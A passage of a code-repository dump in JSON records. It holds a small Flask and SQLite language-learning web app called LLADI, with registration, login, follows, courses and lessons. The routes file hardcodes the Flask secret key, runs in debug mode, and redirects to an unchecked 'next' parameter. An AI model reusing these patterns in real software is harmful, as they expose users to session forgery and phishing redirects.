"DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from passlib.apps import custom_app_context as pwd_context\nfrom LLADI.database import users\n\n\ndef register_user(username, password, display_name):\n users.new_user(username, pwd_context.encrypt(password), display_name)\n\ndef validate_register(username):\n duplicate_user = users.User(username=username)\n if duplicate_user.exists:\n return False\n else:\n return True" }, { "alpha_fraction": 0.616356372833252, "alphanum_fraction": 0.6203457713127136, "avg_line_length": 33.97674560546875, "blob_id": "2c6920879da67f32552d3647506ffaf2f9071732", "content_id": "237e256949fc66f235b35c7c2151f6301bb1f6ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1504, "license_type": "no_license", "max_line_length": 124, "num_lines": 43, "path": "/LLADI/database/follows.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "import sqlite3\nfrom time import strftime, gmtime\n\ndb_url = 'C:\\\\Users\\\\Daniel\\\\Documents\\\\GitHub\\\\LLADI\\\\database\\\\lladi.db'\n\n\nclass Follow():\n def __init__(self, follower=None, followee=None, ufid=None):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n\n if follower:\n cur.execute('SELECT \"Followee\" FROM \"Follow\" WHERE \"Follower\" LIKE ?', (int(follower),))\n elif followee:\n cur.execute('SELECT \"Follower\" FROM \"Follow\" WHERE \"Followee\" LIKE ?', (int(followee),))\n elif ufid:\n cur.execute('SELECT * FROM \"Follow\" WHERE \"UFID\" LIKE ?', (int(ufid),))\n self.data = cur.fetchall()\n\n\ndef new_follow(follower, followee):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n date = strftime(\"%Y%m%d%H%M%S\", gmtime())\n cur.execute(\"insert into Follow('Follower', 'Followee', 'Follow Date') VALUES(?, ?, ?)\",\n (int(follower), int(followee), date))\n conn.commit()\n conn.close()\n\n\ndef remove_follow(follower, followee):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('DELETE FROM \"Follow\" WHERE \"Follower\" LIKE ? AND \"Followee\" LIKE ?', (int(follower), int(followee)))\n conn.commit()\n conn.close()\n\ndef get_follow(follower, followee):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"UFID\" FROM \"Follow\" WHERE \"Follower\" LIKE ? AND \"Followee\" LIKE ?', (int(follower), int(followee)))\n data = cur.fetchone()\n return data[0]\n" }, { "alpha_fraction": 0.45548489689826965, "alphanum_fraction": 0.4848966598510742, "avg_line_length": 42.41379165649414, "blob_id": "33ca663c728b94fc1cbfc1a565dc6122e0e1c4a2", "content_id": "506c759946c634643290b8320e09ac7d32f41d9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1258, "license_type": "no_license", "max_line_length": 107, "num_lines": 29, "path": "/LLADI/functions/feeds.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from LLADI.database import users\nfrom LLADI.database import follows\n\n\ndef create_feed(user):\n feed = []\n for nusers in user.follows:\n fusers = users.User(nusers[0])\n feed.append({\n \"date\": \"{}-{}-{} {}:{}:{}\".format(str(fusers.date)[:4], fusers.date[4:6], fusers.date[6:8],\n fusers.date[8:10], fusers.date[10:12], fusers.date[12:14]),\n \"title\": fusers.display_name + \" created their account\",\n \"body\": \"\",\n \"link\": \"/user/\" + str(fusers.uuid),\n })\n for nuser_follows in fusers.follows:\n date = follows.Follow(ufid=follows.get_follow(fusers.uuid, nuser_follows[0])).data[0][3]\n follow_target = users.User(nuser_follows[0]).display_name\n if follow_target == user.display_name:\n follow_target = \"you\"\n feed.append({\n \"date\": \"{}-{}-{} {}:{}:{}\".format(date[:4], date[4:6], date[6:8], date[8:10], date[10:12],\n date[12:14]),\n \"title\": fusers.display_name + \" followed \" + follow_target,\n \"body\": \"\",\n \"link\": \"/user/\" + str(fusers.uuid),\n })\n\n return feed" }, { "alpha_fraction": 0.7314578294754028, "alphanum_fraction": 0.7314578294754028, "avg_line_length": 25.066667556762695, "blob_id": "266e6d3b0cb8993dcc9fa4d33e8ce8f859f5fad6", "content_id": "85b9dda82dbdce9a27a4b803631d6c822cb04ac8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 66, "num_lines": 15, "path": "/LLADI/functions/login.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from passlib.apps import custom_app_context as pwd_context\nfrom flask import session\nfrom LLADI.database import users\n\n\ndef valid_login(username, password):\n request_user = users.User(username=username)\n if request_user.exists:\n return pwd_context.verify(password, request_user.password)\n else:\n return False\n\n\ndef log_in(username):\n session['username'] = username\n" }, { "alpha_fraction": 0.6235032677650452, "alphanum_fraction": 0.6250482797622681, "avg_line_length": 37.93608856201172, "blob_id": "9f494d3370cf535023ee3eccbd922a2aaf4e0b13", "content_id": "0dc3d2c60b2803ecfc522467eae647aa8c15c219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10356, "license_type": "no_license", "max_line_length": 120, "num_lines": 266, "path": "/routes.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, session, redirect, url_for\nfrom LLADI.database import users, follows, courses, lessons\nfrom LLADI.functions.login import valid_login, log_in\nfrom LLADI.functions.users import current_user\nfrom LLADI.functions.register import register_user, validate_register\nfrom LLADI.functions.follow import validate_follow\nfrom LLADI.functions.feeds import create_feed\nimport base64\n\nimport re\n\napp = Flask(__name__)\n\n\[email protected]('/')\ndef home():\n cu = current_user()\n page = render_template('page/welcome.html')\n return render_template('global/frame.html', content=page, page=\"home\", logged=cu)\n\n\[email protected]('/login/', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n if 'username' not in request.cookies:\n if valid_login(request.form['loginUsername'], request.form['loginPassword']):\n log_in(request.form['loginUsername'])\n if request.args.get('next'):\n return redirect(request.args.get('next'))\n else:\n return redirect(url_for('home'))\n else:\n if request.args.get('next'):\n return redirect(url_for('login') + '?failed=1&next=' + request.args.get('next'))\n else:\n return redirect(url_for('login') + '?failed=1')\n else:\n return redirect(request.args.get('next'))\n else:\n cu = current_user()\n failure = request.args.get('failed')\n page = render_template('page/login.html', failure=failure)\n return render_template('global/frame.html', content=page, page=\"login\", logged=cu)\n\n\[email protected]('/logout/', methods=['GET'])\ndef logout():\n session.pop('username')\n if request.args.get('next'):\n return redirect(request.args.get('next'))\n else:\n return redirect(url_for('home'))\n\n\[email protected]('/register/', methods=['GET', 'POST'])\ndef register():\n if request.method == \"POST\":\n register_username = request.form['registerUsername']\n register_password = request.form['registerPassword']\n register_repeat_password = request.form['registerRepeatPassword']\n register_display_name = request.form['registerDisplayName']\n errors = []\n if len(register_username) < 8:\n errors.append('username_length')\n if len(register_password) < 8:\n errors.append('password_length')\n if len(register_display_name) == 0:\n errors.append('display_name_length')\n if len(re.findall('(^\\s+|\\s\\s+|\\s+$)', register_display_name)) != 0:\n errors.append('display_name_whitespace')\n if register_password != register_repeat_password:\n errors.append('password_no_match')\n if not validate_register(register_username):\n errors.append('username_already_exists')\n query_string = \"?\"\n for error in errors:\n query_string += error + \"=1&\"\n query_string.strip(\"&\")\n if len(errors):\n return redirect(url_for('register') + query_string)\n else:\n register_user(register_username, register_password, register_display_name)\n return redirect(url_for('home'))\n else:\n errors = []\n if request.args.get('username_length'):\n errors.append('username_length')\n if request.args.get('password_length'):\n errors.append('password_length')\n if request.args.get('display_name_length'):\n errors.append('display_name_length')\n if request.args.get('display_name_whitespace'):\n errors.append('display_name_whitespace')\n if request.args.get('password_no_match'):\n errors.append('password_no_match')\n if request.args.get('username_already_exists'):\n errors.append('username_already_exists')\n page = render_template('page/register.html', errors=errors)\n cu = current_user()\n return render_template('global/frame.html', content=page, page=\"register\", logged=cu)\n\n\[email protected]('/user/<userid>')\ndef user(userid):\n cu = current_user()\n pu = users.User(uuid=userid)\n user_follows = []\n user_followed_by = []\n if len(pu.follows):\n for followed_user in pu.follows:\n user_follows.append(users.User(uuid=followed_user[0]))\n if len(pu.followed_by):\n for followed_user in pu.followed_by:\n user_followed_by.append(users.User(uuid=followed_user[0]))\n following = \"no_follow\"\n if cu:\n following = \"False\"\n for check_user in user_followed_by:\n if check_user.uuid == cu.uuid:\n following = \"True\"\n page = render_template('page/userpage.html', user=pu, logged=cu, follows=user_follows, followed_by=user_followed_by,\n following=following)\n return render_template('global/frame.html', content=page, page=\"user\", logged=cu)\n\n\[email protected]('/user/', methods=['GET', 'POST'])\ndef user_search():\n if request.method == \"POST\":\n results = users.search_user(request.form['searchUser'])\n cu = current_user()\n page = render_template('page/usersearch.html', results=results)\n return render_template('global/frame.html', content=page, page=\"user\", logged=cu)\n\n else:\n cu = current_user()\n page = render_template('page/usersearch.html')\n return render_template('global/frame.html', content=page, page=\"user\", logged=cu)\n\n\[email protected]('/course/', methods=['GET', 'POST'])\ndef course_search():\n if request.method == \"POST\":\n results = courses.search_course(request.form['searchCourse'])\n cu = current_user()\n page = render_template('page/coursesearch.html', results=results)\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n else:\n cu = current_user()\n page = render_template('page/coursesearch.html')\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\[email protected]('/follow/', methods=['GET', 'POST'])\ndef follow():\n follower = current_user().uuid\n followee = users.User(uuid=request.form['followee']).uuid\n if validate_follow(follower, followee):\n follows.new_follow(follower, followee)\n return redirect(request.args.get('next'))\n\n\[email protected]('/unfollow/', methods=['GET', 'POST'])\ndef unfollow():\n follower = current_user().uuid\n followee = users.User(uuid=request.form['followee']).uuid\n follows.remove_follow(follower, followee)\n return redirect(request.args.get('next'))\n\n\[email protected]('/feed/')\ndef feed():\n cu = current_user()\n if not cu:\n return redirect(url_for('login') + \"?next=\" + url_for('feed'))\n feed = create_feed(cu)\n feed.sort(key=lambda x: x['date'], reverse=True)\n page = render_template('page/feed.html', feed=feed)\n return render_template('global/frame.html', content=page, page=\"feed\", logged=cu)\n\n\[email protected]('/course/<courseid>')\ndef course(courseid):\n cu = current_user()\n if not cu:\n return redirect(url_for('login') + \"?next=\" + request.url)\n course_page = courses.Course(ucid=courseid)\n course_owner = users.User(uuid=course_page.owner)\n contributor_uuids = courses.get_contributors(courseid)\n lessons = courses.get_lessons(courseid)\n tier = users.get_tier_knowledge(courseid, cu.uuid)\n contributors = []\n for entry in contributor_uuids:\n contributors.append(users.User(uuid=entry))\n page = render_template('page/course.html', course=course_page, owner=course_owner, contributors=contributors,\n lessons=lessons, tier=tier, logged=cu)\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\[email protected]('/lesson/')\ndef lesson_redirect():\n return redirect(url_for('course_search'))\n\n\[email protected]('/create/course/', methods=['GET', 'POST'])\ndef create_course():\n cu = current_user()\n if not cu:\n return redirect(url_for('login') + \"?next=\" + request.url)\n if request.method == \"POST\":\n create_course_name = request.form['createCourseName']\n create_course_owner = cu.uuid\n create_course_picture = str(base64.encodebytes(request.files['createCoursePicture'].stream.read())).strip(\n \"b'\").strip(\"'\").replace(\"\\\\n\", \"\\n\")\n errors = []\n if len(create_course_name) < 3:\n errors.append('course_name_length')\n if request.files['createCoursePicture'].filename.split(\".\")[-1] != \"png\":\n errors.append('image_type')\n if courses.Course(course_name=create_course_name).exists:\n errors.append('course_name_unique')\n query_string = \"?\"\n for error in errors:\n query_string += error + \"=1&\"\n query_string.strip(\"&\")\n if len(errors):\n return redirect(url_for('create_course') + query_string)\n return redirect(\n \"/course/\" + str(courses.create_course(create_course_name, create_course_owner, create_course_picture)))\n else:\n errors = []\n if request.args.get('course_name_length'):\n errors.append('course_name_length')\n if request.args.get('image_type'):\n errors.append('image_type')\n if request.args.get('course_name_unique'):\n errors.append('course_name_unique')\n page = render_template('page/createcourse.html', errors=errors)\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\[email protected]('/create/course/<courseid>/lesson/')\ndef create_lesson(courseid):\n cu = current_user()\n if not cu:\n return redirect(url_for('login') + \"?next=\" + request.url)\n cc = courses.Course(ucid=courseid)\n if cu.uuid != cc.owner and str(cu.uuid) not in courses.get_contributors(cc.ucid):\n return redirect(url_for('course', courseid=courseid))\n page = 'lesson_creator'\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\[email protected]('/lesson/<lessonid>')\ndef lesson(lessonid):\n cu = current_user()\n if not cu:\n return redirect(url_for('login') + \"?next=\" + request.url)\n page = \"hello\"\n return render_template('global/frame.html', content=page, page=\"course\", logged=cu)\n\n\n\nif __name__ == '__main__':\n app.secret_key = '~\\xaa\\xaf\\xdf.\\xb8d\\xe6,\\xdd\\xfd\\x8eD[\\x94\\xaeQku\\xf6{\\xa0\\xd9a'\n app.run(debug=True)" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 46.70000076293945, "blob_id": "98afac2354573706adfa10389f4cbd1af8d2ebe1", "content_id": "85d2c208beb78329b4618558ed695dca544f1f8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 476, "license_type": "no_license", "max_line_length": 126, "num_lines": 10, "path": "/README.md", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "LLADI\n=====\n\nThe Language Learning Application Development Interface is an Online Tool developed by Samuel Blumire to\nfacilitate the free and open platform creation of Online, Language Learning Environments.\n\nThis version is modified so that it can be run on Daniel's computer:\n\n - I made a flask virtual python environment (.gitignore'd due to practicality reasons) in a folder called flask in LLADI repo\n - I have had to change a few of the paths (for example where the database is)" }, { "alpha_fraction": 0.584384560585022, "alphanum_fraction": 0.5898397564888, "avg_line_length": 29.55208396911621, "blob_id": "c652ab00adac9a614b3b30e4cb926f4b8d18a2c4", "content_id": "3a835ac0b5c724b9dec57c0f55a32dec2f9e8add", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2933, "license_type": "no_license", "max_line_length": 116, "num_lines": 96, "path": "/LLADI/database/courses.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "import sqlite3\nfrom time import strftime, gmtime\nfrom LLADI.functions.users import current_user\nfrom . import lessons\n\ndb_url = 'C:\\\\Users\\\\Daniel\\\\Documents\\\\GitHub\\\\LLADI\\\\database\\\\lladi.db'\n\n\nclass Course:\n def __init__(self, ucid=None, course_name=None):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n if ucid:\n cur.execute('SELECT * FROM \"Course\" WHERE \"UCID\" LIKE ?', (ucid,))\n elif course_name:\n cur.execute('SELECT * FROM \"Course\" WHERE \"Course Name\" LIKE ?', (course_name,))\n data = cur.fetchone()\n conn.close()\n if data:\n self.exists = True\n self.ucid = data[0]\n self.course_name = data[1]\n self.owner = data[2]\n self.date = data[3]\n self.picture = data[4]\n else:\n self.exists = False\n\n\ndef new_course(course_name):\n cu = current_user()\n if not cu:\n return None\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n date = strftime(\"%Y%m%d%H%M%S\", gmtime())\n cur.execute(\"insert into Course('Course Name', 'Owner UUID', 'Creation Date') VALUES(?, ?)\",\n (course_name, current_user().uuid, date))\n conn.commit()\n conn.close()\n\n\ndef get_contributors(ucid):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"Contributor UUID\" FROM \"Course Contributor\" WHERE \"Course UCID\" LIKE ?', (ucid,))\n data = cur.fetchall()\n conn.close()\n uuids = []\n for entry in data:\n uuids.append(entry[0])\n return uuids\n\n\ndef get_lessons(ucid):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"ULID\" FROM \"Lesson\" WHERE \"Course UCID\" LIKE ?', (ucid,))\n data = cur.fetchall()\n conn.close()\n uuids = []\n for entry in data:\n uuids.append(entry[0])\n sorted_lessons = []\n for entry in uuids:\n sorted_lessons.append(lessons.Lesson(entry))\n sorted_lessons.sort(key=lambda x: x.tier)\n return sorted_lessons\n\n\ndef search_course(search):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT \"UCID\" FROM \"Course\" WHERE \"Course Name\" LIKE ?', (\"%\" + search + \"%\",))\n data = cur.fetchall()\n conn.close()\n ret = []\n for scourse in data:\n ret.append(Course(ucid=int(scourse[0])))\n return ret\n\n\ndef create_course(name, owner, picture):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n print(picture)\n date = strftime(\"%Y%m%d%H%M%S\", gmtime())\n cur.execute(\"insert into Course('Course Name', 'Owner UUID', 'Creation Date', 'Picture') VALUES(?, ?, ?, ?)\",\n (name, int(owner), date, picture))\n conn.commit()\n cur.execute(\n 'SELECT \"UCID\" FROM \"Course\" WHERE \"Course Name\" LIKE ? AND \"Owner UUID\" LIKE ? AND \"Creation Date\" LIKE ?',\n (name, int(owner), date))\n data = cur.fetchone()\n conn.close()\n return data[0]\n" }, { "alpha_fraction": 0.6850393414497375, "alphanum_fraction": 0.6850393414497375, "avg_line_length": 27.22222137451172, "blob_id": "c3ffd09c6b038b738247a16c5c6928c2f7f391dc", "content_id": "6becdc22018e005ce2f42ae872ba1763f809c603", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 254, "license_type": "no_license", "max_line_length": 51, "num_lines": 9, "path": "/LLADI/functions/follow.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "from LLADI.database import follows\n\ndef validate_follow(follower, followee):\n fcheck = follows.Follow(follower=follower).data\n match = False\n for followed in fcheck:\n if followee in followed:\n match = True\n return not match\n" }, { "alpha_fraction": 0.508690595626831, "alphanum_fraction": 0.5196987390518188, "avg_line_length": 32.843135833740234, "blob_id": "31b498e86b0a1760030f47bb2800d2171ae9a9e2", "content_id": "b3da3e9bef55de77e99cae75e3783ae556a76e2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1726, "license_type": "no_license", "max_line_length": 130, "num_lines": 51, "path": "/LLADI/database/lessons.py", "repo_name": "DanielSherlock/LLADI", "src_encoding": "UTF-8", "text": "import sqlite3\nfrom time import strftime, gmtime\n\ndb_url = 'C:\\\\Users\\\\Daniel\\\\Documents\\\\GitHub\\\\LLADI\\\\database\\\\lladi.db'\n\n\nclass Lesson:\n def __init__(self, ulid):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n cur.execute('SELECT * FROM \"Lesson\" WHERE \"ULID\" LIKE ?', (ulid,))\n data = cur.fetchone()\n conn.close()\n if data:\n self.exists = True\n self.ulid = data[0]\n self.name = data[1]\n self.course_ucid = data[2]\n self.tier = data[3]\n self.date = data[4]\n else:\n self.exists = False\n\n\nclass Question:\n def __init__(self, q_type, uqid):\n conn = sqlite3.connect(db_url)\n cur = conn.cursor()\n if q_type == \"Q_3OPT\":\n cur.execute('SELECT * FROM \"Q_3OPT\" WHERE \"UQID\" LIKE ?', (uqid,))\n data = cur.fetchone()\n if data:\n self.exists = True\n self.type = q_type\n self.uqid = data[0]\n self.word = data[1]\n self.target = data[2]\n self.picture = data[3]\n self.lesson_ulid = data[4]\n self.audio = data[5]\n cur.execute('SELECT \"Key UKID\", \"Required Knowledge\" FROM \"KeyQuestionRequire\" WHERE \"Question UQID\" LIKE ?', (uqid,))\n self.requiredKeys = {}\n for key in cur.fetchall():\n self.requiredKeys[key[0]] = key[1]\n cur.execute('SELECT \"Key UKID\" FROM \"KeyQuestionEffect\" WHERE \"Question UQID\" LIKE ?', (uqid,))\n self.effectedKeys = []\n for key in cur.fetchall():\n self.effectedKeys.append(key[0])\n else:\n self.exists = False\n conn.close()\n" } ]
14
RishabKattimani/FaunaDBReadCSV
https://github.com/RishabKattimani/FaunaDBReadCSV
da6c3872fe7388364a63c5b967c6711301f6d0e5
1a2fd35e510b6bd4ee461de0eddce9836af66e20
d39690bb4b1fd80c06d278cc4a2cc458d4bb3d5d
refs/heads/master
2022-12-02T12:48:00.704505
2020-07-27T16:35:36
2020-07-27T16:35:36
282,954,871
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.3745519816875458, "alphanum_fraction": 0.38649940490722656, "avg_line_length": 30.823530197143555, "blob_id": "307ce5d0aa9166c89d9b664f15cc6b2e19a5cf2e", "content_id": "6725b178e35e15c13acdbe17bc115539cef7f714", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1674, "license_type": "no_license", "max_line_length": 105, "num_lines": 51, "path": "/csvread (Rishab Kattimani's conflicted copy 2020-07-24).py", "repo_name": "RishabKattimani/FaunaDBReadCSV", "src_encoding": "UTF-8", "text": "#-------------------------------------------------------------------------------\r\n# Imports\r\nfrom faunadb import query as q\r\nfrom faunadb.objects import Ref\r\nfrom faunadb.client import FaunaClient\r\nfrom csv import *\r\nfrom datetime import datetime, date\r\nimport config as config\r\n#-------------------------------------------------------------------------------\r\n# Variables & Setup\r\nclient = FaunaClient(secret=config.secret) # Connection To Fauna\r\n\r\n# ------------------------------------------------------------------------------\r\n# Reading CSV File\r\nwith open('data.csv', 'r') as read_obj:\r\n\r\n csv_reader = reader(read_obj)\r\n\r\n#-------------------------------------------------------------------------------\r\n# Getting Age\r\n for row in csv_reader:\r\n\r\n date_str = row[2]\r\n\r\n date_object = datetime.strptime(row[2], '%m/%d/%Y').date()\r\n\r\n today = date.today()\r\n\r\n age = (today.year - date_object.year)\r\n#-------------------------------------------------------------------------------\r\n# Age Groups\r\n if age >= 19 and age <= 60:\r\n AgeGroup = \"Adult\"\r\n\r\n if age >= 60 and age <= 1000:\r\n AgeGroup = \"Senior\"\r\n\r\n if age >= 9 and age <= 19:\r\n AgeGroup = \"Teen\"\r\n\r\n if age >= 0 and age <= 9:\r\n AgeGroup = \"Child\"\r\n#-------------------------------------------------------------------------------\r\n# Pushing Data To FaunaDB\r\n print (age, AgeGroup)\r\n\r\n client.query(\r\n q.create(\r\n q.collection(\"BollywoodActor\"),\r\n {\"data\": {\"Name\": row[0], \"Image\": row[1], \"DOB\": row[2], \"Age\": age, \"AgeGroup\": AgeGroup}}\r\n ))\r\n" } ]
1
hasanbal/django-rest
https://github.com/hasanbal/django-rest
864b95f7e2d141126caecacb657e443a0cc1a0b9
2d0c5a0c5ccb78960a2de50919d328d1f0c9b69f
bd75cadb74d538f948110cc523727d755199c0cc
refs/heads/master
2020-04-17T00:55:13.380891
2019-01-16T17:14:51
2019-01-16T17:14:51
166,067,805
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7759103775024414, "alphanum_fraction": 0.7787114977836609, "avg_line_length": 26.461538314819336, "blob_id": "209aa5623a95915b3b43ed8004570cc617ea01bd", "content_id": "47a2d3b1dc78e5c6505ce62f53c351194e074199", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 45, "num_lines": 13, "path": "/rest-api/rest/views.py", "repo_name": "hasanbal/django-rest", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\n\nfrom models import Driver\nfrom rest_framework import viewsets\nfrom rest.serializers import DriverSerializer\n# Create your views here.\n\nclass DriverViewSet(viewsets.ModelViewSet):\n queryset = Driver.objects.all()\n serializer_class = DriverSerializer\n" }, { "alpha_fraction": 0.7185090184211731, "alphanum_fraction": 0.7455012798309326, "avg_line_length": 21.22857093811035, "blob_id": "14c67036be52a2f1f0be38077f48e404cbadb7e3", "content_id": "322f56a39002ed25cbaa26ed3c761178e749f58d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 778, "license_type": "no_license", "max_line_length": 121, "num_lines": 35, "path": "/README.md", "repo_name": "hasanbal/django-rest", "src_encoding": "UTF-8", "text": "# django-rest\nSimple Django Rest Framework Example\n\n# How To Use\n\nFirstly, you should install **django** and **djangorestframework**\n```\npip install django\n```\n```\npip install djangorestframework\n```\n\nAfter installation download the project files and migrate. Don't forget to going project directory before migration.\n\n```\npython manage.py migrate\n```\n\nThen create a superuser for using API functions\n```\npython manage.py createsuperuser --email [email protected] --username admin\n```\n\nFinally, run server.\n```\npython manage.py runserver\n```\n\n\nYou can see the sample drivers at http://127.0.0.1:8000/drivers/\n\nAlso you can create, read, update and delete drivers. \n\nFor delete and update functions you should go to the specific drivers link, for example: http://127.0.0.1:8000/drivers/1/\n" } ]
2
shabazbpatel/datmo-face-recognition
https://github.com/shabazbpatel/datmo-face-recognition
5e12feff5570c5528f0b943a971f805a314472ef
a022a2242d792cad71e915380edc4848bbbe99a1
2db12b032203d2e33cd4ca213206a045733df743
refs/heads/master
2018-05-02T18:19:43.257763
2017-10-16T23:02:53
2017-10-16T23:02:53
87,882,677
1
1
null
2017-04-11T03:08:48
2017-08-18T08:02:05
2017-08-22T18:42:03
Jupyter Notebook
[ { "alpha_fraction": 0.6821244359016418, "alphanum_fraction": 0.6884661316871643, "avg_line_length": 31.779220581054688, "blob_id": "24d6aa869e0309930e4e3c5f5484f86cdf4a917d", "content_id": "c5792a2f7db5244c042b7299ea44a95c958a97bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2523, "license_type": "no_license", "max_line_length": 92, "num_lines": 77, "path": "/recognition.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import face_recognition\nimport os\nimport pandas as pd\nimport numpy as np\nimport json\nimport pickle\nfrom glob import glob\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import precision_recall_fscore_support\nnp.random.seed(5)\n\ndata = []\ntarget = []\nface_names = []\nnum_faces = len(face_names)\n# Training load data\nfaces_selected = set()\n\nwith open(os.environ['INPUT_DIR']+'/config.json') as f:\n config = json.load(f)\n\nclass_names = config['class_names']\nn_jobs = int(config['n_jobs'])\nsplit_prob = config['split_prob']\n\nfor file_path in glob(os.environ.get(\"DATA_DIR\")+\"/*/*\"):\n class_name = file_path.split('/')[-2]\n if class_name in class_names and class_name != 'test':\n if class_name not in faces_selected:\n faces_selected.add(class_name)\n face_names.append(class_name)\n load_image = face_recognition.load_image_file(file_path)\n list_encoding = face_recognition.face_encodings(load_image)\n if len(list_encoding) > 0:\n face_encoding = list_encoding[0]\n data.append(face_encoding)\n target.append(face_names.index(class_name))\n\nface_names = np.array(face_names)\ndata = np.asarray(data)\ndimensions = range(len(face_encoding))\nfilename = os.path.join(os.environ['OUTPUT_DIR'],'face_names.pkl')\npickle.dump(face_names, open(filename, 'wb'))\n\n\ndf = pd.DataFrame(data, columns=dimensions)\ndf['is_train'] = np.random.uniform(0, 1, len(df)) <= split_prob\ndf['face'] = pd.Categorical.from_codes(target, face_names)\ndf.head()\n\ntrain, test = df[df['is_train']==True], df[df['is_train']==False]\n\nfeatures = df.columns[:len(face_encoding)]\nclf = RandomForestClassifier(n_jobs=n_jobs)\ny, _ = pd.factorize(train['face'])\nclf.fit(train[features], y)\npreds = face_names[np.array(clf.predict(test[features]))]\ncross_validation = pd.crosstab(test['face'], preds, rownames=['actual'], colnames=['preds'])\ny_true = np.array(list(test['face']))\ny_pred = np.array(preds)\n\np_r_f1 = precision_recall_fscore_support(y_true, y_pred, average='macro')\nprecision = p_r_f1[0]\nrecall = p_r_f1[1]\nf1_score = p_r_f1[2]\nstats = {'label': 'random_forest'}\nstats['precision'] = precision\nstats['recall'] = recall\nstats['f1_score'] = f1_score\nprint stats\n\nmodel_filename = os.path.join(os.environ['OUTPUT_DIR'],'model.dat')\npickle.dump(clf, open(model_filename, 'wb'))\nstats_filename = os.path.join(os.environ['OUTPUT_DIR'],'stats.json')\nwith open(stats_filename, 'wb') as f:\n f.write(json.dumps(stats))" }, { "alpha_fraction": 0.7632508873939514, "alphanum_fraction": 0.768551230430603, "avg_line_length": 39.5, "blob_id": "19e6f15ce54420aa195d2a9a951e087f3ad6aee6", "content_id": "4288e3a697cf1e0ef695e8a123c15a6fa7360f9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 566, "license_type": "no_license", "max_line_length": 86, "num_lines": 14, "path": "/verification.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import face_recognition\nimport os\n\ndonald_image_path = os.path.join(os.environ.get(\"DATA_DIR\"), 'putin', '4.jpg')\nunknown_image_path = os.path.join(os.environ.get(\"DATA_DIR\"), 'test', 'putin_snl.jpg')\nknown_image = face_recognition.load_image_file(donald_image_path)\nunknown_image = face_recognition.load_image_file(unknown_image_path)\n\ndonald_encoding = face_recognition.face_encodings(known_image)[0]\nunknown_encoding = face_recognition.face_encodings(unknown_image)[0]\n\nresults = face_recognition.compare_faces([donald_encoding], unknown_encoding)\n\nprint(results)" }, { "alpha_fraction": 0.76953125, "alphanum_fraction": 0.76953125, "avg_line_length": 31.125, "blob_id": "0f7b9c9acb78d943d8c372798bf1018908c80fea", "content_id": "26c36cac19fe36b4811c5c41523ff63748cf2246", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 79, "num_lines": 8, "path": "/landmark_detection.py", "repo_name": "shabazbpatel/datmo-face-recognition", "src_encoding": "UTF-8", "text": "import os\nimport face_recognition\n\nimage_path = os.path.join(os.environ.get(\"DATA_DIR\"), 'test', 'test_image.jpg')\n\nimage = face_recognition.load_image_file(image_path)\nface_landmarks_list = face_recognition.face_landmarks(image)\nprint(face_landmarks_list)" }, { "alpha_fraction": 0.7799227833747864, "alphanum_fraction": 0.7799227833747864, "avg_line_length": 42.16666793823242, "blob_id": "9ab3566fc757f4f9254d8922005348e247ffd105", "content_id": 